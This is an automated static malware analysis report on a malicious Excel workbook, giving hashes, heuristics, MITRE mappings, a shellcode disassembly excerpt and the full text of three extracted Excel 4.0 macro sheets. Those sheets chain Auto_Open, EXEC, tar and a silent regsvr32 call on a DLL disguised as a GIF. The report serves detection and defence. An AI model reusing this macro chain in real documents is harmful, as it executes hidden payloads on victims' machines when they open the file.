Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1a47f38f1210a686…

MALICIOUS

Office (OOXML)

921.5 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-06-04
MD5: bbc15535faddcb65c345b8a85d119de8 SHA-1: 15affe82c04dc092bf47260c7532d83f1089fec1 SHA-256: 1a47f38f1210a686edb5bdf36af7ed3e12fcfddf2c87281bcba644a061bfef0a
330 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1203 Exploitation for Client Execution

This Excel document contains Excel 4.0 macro sheets with Auto_Open defined names, indicating it is designed to execute code upon opening. The document body prompts the user to 'enable editing and content mode for invoice calculation', a common lure to bypass macro security. The macros utilize dangerous functions like EXEC and GOTO, which can be used to download and execute arbitrary code. The presence of LoadLibrary and GetProcAddress API references further suggests dynamic code loading.

Heuristics 9

  • Excel 4.0 macro sheet (3 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
  • Dangerous XLM formula APIs: GOTO, EXEC, HALT critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    Attempted x86 opcode disassembly
    0008948F  64a130000000      mov eax, dword ptr fs:[0x30]
00089495  894508            mov dword ptr [ebp + 8], eax
00089498  8b4d08            mov ecx, dword ptr [ebp + 8]
0008949B  8b5618            mov edx, dword ptr [esi + 0x18]
0008949E  895108            mov dword ptr [ecx + 8], edx
000894A1  8b4e04            mov ecx, dword ptr [esi + 4]
000894A4  8b4928            mov ecx, dword ptr [ecx + 0x28]
000894A7  034e18            add ecx, dword ptr [esi + 0x18]
000894AA  ffd1              call ecx
000894AC  6a00              push 0
000894AE  ff563c            call dword ptr [esi + 0x3c]
000894B1  33c0              xor eax, eax
000894B3  40                inc eax
000894B4  eb02              jmp 0x894b8
000894B6  33c0              xor eax, eax
000894B8  5e                pop esi
000894B9  c9                leave
000894BA  c20400            ret 4
000894BD  55                push ebp
000894BE  8bec              mov ebp, esp
000894C0  51                push ecx
000894C1  8b423c            mov eax, dword ptr [edx + 0x3c]
000894C4  56                push esi
000894C5  8bf1              mov esi, ecx
000894C7  57                push edi
000894C8  8b441050          mov eax, dword ptr [eax + edx + 0x50]
000894CC  89460c            mov dword ptr [esi + 0xc], eax
000894CF  b84d5a0000        mov eax, 0x5a4d
000894D4  895608            mov dword ptr [esi + 8], edx
000894D7  8916              mov dword ptr [esi], edx
000894D9  663902            cmp word ptr [edx], ax
000894DC  755c              jne 0x8953a
000894DE  8b423c            mov eax, dword ptr [edx + 0x3c]
000894E1  bf50450000        mov edi, 0x4550
000894E6  03c2              add eax, edx
000894E8  894604            mov dword ptr [esi + 4], eax
000894EB  3938              cmp dword ptr [eax], edi
000894ED  754b              jne 0x8953a
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 4 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 1750 bytes
SHA-256: 16906c43ea71e7ceb95d2718eec32533a2cb6af3357ce8a6142e8a664da0db88
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{92BAA9A6-CCD7-4C96-B244-8027D75B3DA4}"><dimension ref="H22:I28"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="10.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="10.5703125" style="2"/><col min="8" max="8" width="16.85546875" style="2" bestFit="1" customWidth="1"/><col min="9" max="16384" width="10.5703125" style="2"/></cols><sheetData><row r="22" spans="8:9" x14ac:dyDescent="0.25"><c r="I22" s="2" t="s"><v>2</v></c></row><row r="23" spans="8:9" x14ac:dyDescent="0.25"><c r="H23" s="2" t="b"><f>SAVE.COPY.AS(I22&amp;I23)</f><v>0</v></c><c r="I23" s="2" t="s"><v>1</v></c></row><row r="28" spans="8:9" x14ac:dyDescent="0.25"><c r="H28" s="2" t="e"><f>GOTO(Nolaert!AK19)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_01.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet2.xml 1855 bytes
SHA-256: 36317a1726fcc0ea4f4b9877cdd923b9a162e77bfb18441186d29aec7144a8de
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0200-000000000000}"><dimension ref="AK703:AK717"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="13.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="36" width="13.140625" style="2"/><col min="37" max="37" width="37.42578125" style="2" bestFit="1" customWidth="1"/><col min="38" max="16384" width="13.140625" style="2"/></cols><sheetData><row r="703" spans="37:37" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="AK703" s="2" t="b"><f>EXEC(Bkidydj!L15&amp;Bkidydj!L16&amp;Bkidydj!L17)</f><v>0</v></c></row><row r="706" spans="37:37" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="AK706" s="2" t="b"><f>WAIT(NOW()+"00:00:05")</f><v>0</v></c></row><row r="717" spans="37:37" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="AK717" s="2" t="e"><f>GOTO(Bkidydj!G5)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_02.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet3.xml 2339 bytes
SHA-256: 31f588c7324c4e72af751bb0a95a8d409e0841c96318e2fa41d7e0a83f2289dc
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{72FD7C7A-A3BA-4BD4-A707-DDD14281DB2B}"><dimension ref="E14:L30"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="4" width="9.140625" style="2"/><col min="5" max="5" width="27.5703125" style="2" customWidth="1"/><col min="6" max="6" width="9.140625" style="2"/><col min="7" max="7" width="13.28515625" style="2" bestFit="1" customWidth="1"/><col min="8" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="14" spans="7:12" x14ac:dyDescent="0.25"><c r="G14" s="2" t="b"><f>EXEC(E29&amp;E30)</f><v>0</v></c></row><row r="15" spans="7:12" x14ac:dyDescent="0.25"><c r="L15" s="2" t="str"><f>"tar -x"</f><v>tar -x</v></c></row><row r="16" spans="7:12" x14ac:dyDescent="0.25"><c r="L16" s="2" t="str"><f>"f ..\"</f><v>f ..\</v></c></row><row r="17" spans="5:12" x14ac:dyDescent="0.25"><c r="L17" s="2" t="str"><f>"Nioka.meposv -C ..\"</f><v>Nioka.meposv -C ..\</v></c></row><row r="19" spans="5:12" x14ac:dyDescent="0.25"><c r="G19" s="2" t="b"><f>HALT()</f><v>0</v></c></row><row r="29" spans="5:12" x14ac:dyDescent="0.25"><c r="E29" s="2" t="str"><f>"Regs"</f><v>Regs</v></c></row><row r="30" spans="5:12" x14ac:dyDescent="0.25"><c r="E30" s="2" t="str"><f>"vr32 -s ..\xl\media\image1.gif"</f><v>vr32 -s ..\xl\media\image1.gif</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.